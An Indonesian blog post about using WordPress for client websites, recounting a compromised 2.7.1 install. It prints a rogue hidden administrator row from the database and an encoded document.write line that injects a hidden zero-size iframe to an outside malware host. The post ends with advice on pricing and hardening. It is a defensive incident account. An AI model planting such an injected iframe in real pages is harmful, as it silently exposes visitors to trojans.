Wordpress Engine Favorit

Hampir semua orang di dunia ini yang menjabat sebagai blogger pasti kenal dengan WordPress, blog engine open source ini banyak diminati karena kemampuanya yang sangat stabil dan sangat mudah, selain itu kehebatanya menggunakan plugin plugin yang membuat fitur blog semakin tak terhingga.

Biasanya, aku suka ngerjain orderan orang untuk membuat web dengan menggunakan wordpress, of course, I’m wordpress maniac, yang sebelumnya pada zaman dahulu kala aku pake nucleus cms, beberapa tahun menjadi lurker wordpress memang secara tidak sadar aku sudah mempelajari semua struktur nya, alhasil, tiap orderan web yang minta bikinin aku pakenya engine wordpress. WordPress bisa di desain sebagai CMS, Sebagai Produc catalog, Web Portofolio, dan lainya, jadi ngga ada alasan buat engga make WordPress, hehe….Jeleknya WordPress, its too dependable dengan versioning, memang sih, kalau mau aman, dan memiliki fitur yang lebih baik, ikuti versioning wordpress, lagian upgradenya juga mudah, 1 click aja, tapi masalahnya kalau kita, membuatkan web buat seseorang dengan menggunakan wordpress, maka apakah kita harus selalu mengupgrade ? termasuk plugin plugin nya ? well, tentu saja ini akan menjadi pekerjaan yang menyakitkan diwaktu mendatang dan kebanyakan user yang memiliki web tersebut tidak mau tahu menau soal ini, mereka maunya ini web bisa dipake dan aman dan juga tampa keterlibatan kita lagi dimasa mendatang.

Hal ini pernah menjadi pengalamanku, aku pake wordpress 2.7.1, secara “tidak disengaja” web client tersebut di susupi oleh mailcious code, yah, mungkin ada spam comment yang isinya javascript, di encode sedemikian rupa, dan tidak sengaja ter approve, akibatnya, scripts tersebut membuat user baru, sebagai administrator pangkatnya dan menyisipi sebuah javascript lagi, yang membuat page kita di redirect ke sebuah website yang sudah lengkap dengan trojan / botnet.

Didalam SQL aku nemuin ini: lalu kalau kita cek di user admin di wordpress control panel, user ini ga keliatan:

(18,'JordonOntiveros83','$P$Bh7.jFhrVmS6/Nxkc2mgUVVxoqiLOT0','jordonontiveros83','','','2009-09-06 02:33:41','',0,'JordonOntiveros83')

Saat web di generate , kita akan lihat code dibawah ini (setelah tag </head>) :

document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’));

Anehnya, kalo kita selidiki didalam template, tidak ada code semacam ini: so ??

Akhirnya mau ga mau kita jadi kerepotan ngurusin “update” wordpress karena kita harus menjaga sekuritinya, apalagi kalo web nya kena hack ? kan malu, reputasi, hahaha.

Model model jualan bikin web (biasanya):

1. Buat web, selesai, dibayar, dan ikut biaya Maintain (kalo ada agreement dengan maintain nya sekalian)
2. Beli putus, deploy dan pakai, maintain di tanggung owner (dokumentasi lengkap diberikan)

Nah bagi yang menjual jasa dengan menggunakan wordpress sebagai core engine dan itu juga bersifat “beli putus”, sebaiknya kita harus putuskan fungsi dependen wordpress dari update, loh bukanya malah ga aman ? nanti dulu…. Dari situ kita harus melakukan full custom wordpress, dan merubah beberapa struktur standarnya, akibatnya, wordpress yang kita deploy tidak akan bergantung kepada update, namun untuk menggunakan cara ini kita harus memperhatikan beberapa bagian misalnya aja:

1. Melakukan observasi mengenai wordpress yang paling stable, beserta dengan plugin nya, dan juga menggunakan plugin yang paling stable.
2. Melakukan hardenning sekuriti wordpress dengan mengkostumasi wordpress dengan style kita sendiri, namun jgn lupa, serumit apapun customize yang kita buat wordpress masih tetap upgradeable.
3. Memastikan spam comment bisa di filterisasi dengan baik, hanya mengandalkan akismet belum cukup

Mengenai selengkapnya mungkin nanti aku tulis di teknoinfo aja, takutnya pada ga mudeng kalo yang baca disini.